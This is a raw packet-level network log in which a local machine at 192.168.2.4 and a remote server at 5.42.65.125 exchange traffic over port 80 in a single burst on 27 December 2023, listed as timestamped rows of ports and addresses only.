Dec 27, 2023 18:12:25.408986092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.408993006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.409003019 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.409028053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.409051895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.409059048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.409089088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.409112930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.409120083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.409131050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.409137011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.409143925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.409154892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.409173012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.409189939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.409198046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.409209013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.409230947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.409231901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.409239054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.409274101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.409363031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.409374952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.409385920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.409392118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.409398079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.409410000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.409410954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.409424067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.409430981 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.409431934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.409439087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.409454107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.409466982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.409833908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.409904957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.409944057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.410027027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.410034895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.410039902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.410047054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.410058022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.410062075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.410063982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.410072088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.410083055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.410085917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.410089016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.410092115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.410095930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.410115957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.410140038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.410140038 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.410147905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.410180092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.410180092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.410187960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.410211086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.410223007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.410243034 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.410319090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.410326004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.410332918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.410339117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.410346031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.410357952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.410362959 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.410366058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.410387993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.410403013 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.410738945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.410747051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.410783052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.410871983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.410878897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.410909891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.410979033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.410985947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.411021948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.411036015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.411042929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.411055088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.411061049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.411072016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.411077023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.411091089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.411117077 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.411232948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.411240101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.411251068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.411257029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.411263943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.411269903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.411277056 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.411281109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.411288023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.411292076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.411294937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.411302090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.411308050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.411309958 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.411314011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.411324978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.411324978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.411343098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.411344051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.411365032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.411386013 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.411742926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.411767960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.411783934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.411806107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.411830902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.411832094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.411839008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.411845922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.411864042 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.411931992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.411940098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.411946058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.411952019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.411958933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.411971092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.411973000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.411978006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.411994934 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.412010908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.412019968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.412025928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.412038088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.412044048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.412050009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.412056923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.412058115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.412062883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.412070990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.412084103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.412108898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.412183046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.412190914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.412201881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.412228107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.412555933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.412609100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.412621021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.412645102 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.412700891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.412707090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.412713051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.412724018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.412734032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.412735939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.412739992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.412746906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.412754059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.412767887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.412782907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.412807941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.412815094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.412827015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.412833929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.412853956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.412864923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.412868023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.412872076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.412906885 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.412920952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.412926912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.412938118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.412945032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.412951946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.412962914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.412988901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.413039923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.413047075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.413058996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.413065910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.413089037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.413570881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.413578987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.413589001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.413595915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.413602114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.413609028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.413615942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.413616896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.413623095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.413646936 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.413729906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.413758993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.413765907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.413775921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.413781881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.413794994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.413800955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.413806915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.413808107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.413815022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.413821936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.413822889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.413827896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.413841009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.413847923 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.413847923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.413856030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.413866043 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.413883924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.413885117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.413892031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.413925886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.414414883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.414422989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.414436102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.414455891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.414470911 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.414479971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.414488077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.414499044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.414522886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.414557934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.414566040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.414577961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.414585114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.414602995 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.414661884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.414669037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.414680004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.414686918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.414699078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.414705038 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.414710999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.414717913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.414731026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.414755106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.414767981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.414774895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.414781094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.414788008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.414793968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.414804935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.414823055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.414827108 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.414829969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.414841890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.414849043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.414863110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.414879084 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.415333986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.415380955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.415391922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.415399075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.415405989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.415426016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.415441036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.415461063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.415468931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.415478945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.415497065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.415503979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.415505886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.415510893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.415534019 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.415548086 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.415577888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.415642023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.415647984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.415659904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.415678978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.415687084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.415705919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.415715933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.415721893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.415744066 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.415745974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.415754080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.415771961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.415783882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.415796995 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.415802956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.415815115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.415838957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.416271925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.416279078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.416285992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.416292906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.416300058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.416312933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.416316032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.416332960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.416352034 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.416387081 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.416424990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.416433096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.416471004 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.416475058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.416481972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.416516066 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.416549921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.416558027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.416591883 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.416713953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.416726112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.416733027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.416740894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.416748047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.416748047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.416754007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.416760921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.416771889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.416773081 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.416779041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.416790009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.416798115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.416805029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.416805029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.416811943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.416836023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.416858912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.417186975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.417193890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.417201996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.417228937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.417262077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.417270899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.417283058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.417309046 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.417309999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.417318106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.417330027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.417355061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.417366982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.417367935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.417376041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.417387962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.417395115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.417413950 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.417427063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.417433023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.417434931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.417443037 CET	80	49738	5.42.65.125	192.168.2.4
